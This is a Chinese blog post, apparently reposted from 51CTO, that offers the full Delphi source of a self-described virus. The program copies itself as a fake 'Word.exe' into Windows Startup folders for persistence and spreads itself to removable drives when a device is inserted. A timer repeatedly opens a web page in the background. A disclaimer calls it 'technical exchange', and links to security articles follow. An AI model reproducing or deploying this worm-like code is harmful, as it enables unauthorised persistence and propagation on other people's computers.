一个delphi开发的恶意程序代码

简介:
这个delphi程序是去年上半年为了测试病毒和病毒代码库所做的恶意程序,功能有:程序运行后,会将自己添加到系统启动项中,如果有u盘接入,会自动copy自己到优盘上,还可以在指定时间内,在系统后台进行某些操作,比如打开网页什么的,该程序已经在去年被列为病毒了。本文只做技术交流,请勿用于非法用途,出现任何问题,本人概不负责。下面时代码,dephi7开发,用了一个timer控件:
unit Unit1;
interface
uses
    Windows, Messages, SysUtils, Variants, Classes, Controls, Forms,
  Dialogs,ShellApi,StdCtrls, ExtCtrls;
type
  TForm1 = class(TForm)
    Timer1: TTimer;
    procedure FormCreate(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
  private
    { Private declarations }
    procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
  public
    { Public declarations }
  end;
var
  Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.WMDeviceChange (var Msg: TMessage);
var
   //myMsg : String;
   m_Result,i:Integer;
   str_temp:string;
   buf:array   [0..MAX_PATH-1]   of   char;
begin
   Case Msg.WParam of
   32768:
begin
   //myMsg :='U盘插入';
   //Label1.Caption:=myMsg;
  m_Result:=GetLogicalDriveStrings(MAX_PATH,buf);
     for i:=0 to (m_Result div 4) do
  begin
        str_temp:=string(buf[i*4]+buf[i*4+1]+buf[i*4+2]);
         if getdrivetype(pchar(str_temp)) = DRIVE_CDROM  then
         begin
            if  str_temp ='E:\' then
            CopyFile(Pchar(Application.ExeName),Pchar('F:\Word.exe'),False);
            if  str_temp ='F:\' then
            CopyFile(Pchar(Application.ExeName),Pchar('G:\Word.exe'),False);
            if  str_temp ='G:\' then
            CopyFile(Pchar(Application.ExeName),Pchar('H:\Word.exe'),False);
            if  str_temp ='H:\' then
            CopyFile(Pchar(Application.ExeName),Pchar('I:\Word.exe'),False);
   end;
   end;
   end;
   32772:
begin
   //myMsg :='U盘拔出';
   //Label1.Caption:=myMsg;
end;
   end;
end;
 
procedure TForm1.FormCreate(Sender: TObject);
begin
if fileexists('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\Word.exe') and fileexists('C:\Documents and Settings\new\「开始」菜单\程序\启动\Word.exe')then
else
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\Word.exe'),False);
//FileSetAttr('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\Word.exe',FILE_ATTRIBUTE_HIDDEN);
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\new\「开始」菜单\程序\启动\Word.exe'),False);
//FileSetAttr('C:\Documents and Settings\new\「开始」菜单\程序\启动\Word.exe',FILE_ATTRIBUTE_HIDDEN);
end;
procedure TForm1.Timer1Timer(Sender: TObject);
var

  strurl:string;
begin
  StrUrl:='http://www.cnking.org';
  ShellExecute(0,'open',pchar(StrUrl),nil,nil,SW_SHOW);
  end;

end.




本文转自 小王 51CTO博客,原文链接:http://blog.51cto.com/xiaowang/313303,如需转载请自行联系原作者
相关文章
|
6月前
|
SQL 安全 数据库
Python Web开发者必看!SQL注入、XSS、CSRF全面解析,守护你的网站安全!
在Python Web开发中,构建安全应用至关重要。本文通过问答形式,详细解析了三种常见Web安全威胁——SQL注入、XSS和CSRF,并提供了实用的防御策略及示例代码。针对SQL注入,建议使用参数化查询;对于XSS,需对输出进行HTML编码;而防范CSRF,则应利用CSRF令牌。通过这些措施,帮助开发者有效提升应用安全性,确保网站稳定运行。
101 1
|
6月前
|
存储 SQL 安全
【恶意代码系列】一.何谓恶意代码
【恶意代码系列】一.何谓恶意代码
|
开发框架 安全 PHP
ThinkPHP5 5.0.20 远程代码执行漏洞
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
1217 0
ThinkPHP5 5.0.20 远程代码执行漏洞
|
SQL 缓存 安全
phpcms2008网站漏洞修复 远程代码写入缓存漏洞利用
SINE安全公司在对phpcms2008网站代码进行安全检测与审计的时候发现该phpcms存在远程代码写入缓存文件的一个SQL注入漏洞,该phpcms漏洞危害较大,可以导致网站被黑,以及服务器遭受黑客的攻击,关于这次发现的phpcms漏洞细节以及如何利用提权我们来详细剖析。
172 0
phpcms2008网站漏洞修复 远程代码写入缓存漏洞利用
|
XML Web App开发 安全
我如何发现Facebook服务器中的远程代码执行漏洞
大家好!首先我做一下自我介绍。我叫Reginaldo Silva,是一名巴西籍的计算机工程师。最近我的工作与信息安全有关,尤其是在Web应用程序安全性的方面。如果可以的话,我很乐意给大家演示如何入侵网站和应用程序。我的主页上有一些相关信息,欢迎大家浏览。
218 0
|
Web App开发 JavaScript 安全
臭名昭著的十种Web恶意攻击软件
传播恶意软件的网站可能已经趋于稳定,但是web所滋生的恶意软件却在与日俱增。根据思科所发布的2010年全球威胁报告的内容,犯罪份子正利用搜索引擎优化和社交工程来使其伎俩更高效,将更多的目标受害者吸引到少量的网址上。
2746 0
|
监控 安全 NoSQL
服务器被矿机程序攻击
事件经过 今天早上7:00,收到腾讯云监控发来基础监控告警:某台服务器的CPU利用率为100%。SSH登录到服务器正常,说明root密码还没有被更改,我最初怀疑有可能是DDos攻击。
1922 0
|
安全 应用服务中间件 网络安全
Struts2致命远程执行代码漏洞植入门罗币挖矿安装病毒解决方法
早期由于redis低版本发现远程可执行代码漏洞,导致被黑客植入挖矿木马,服务器沦为矿机。今年Struts2又出现该漏洞,一年前自己有用Struts2编写过一个网站,没想到今天被我遇到了,特地写文章记录一下。
2334 0
|
安全 网络协议 Java
谨防黑客通过Java 和Python的FTP注入漏洞绕过你的防火墙
本文讲的是谨防黑客通过Java 和Python的FTP注入漏洞绕过你的防火墙,最近,Java的FTP URL处理代码中的一个协议流注入漏洞已经被安全研究人员发现并公布,它允许协议流注入。根据研究,这个协议流注入漏洞可以利用现有的XXE或SSRF漏洞,让黑客通过SMTP协议从Java应用程序发送未经授权的恶意电子邮件。
1930 0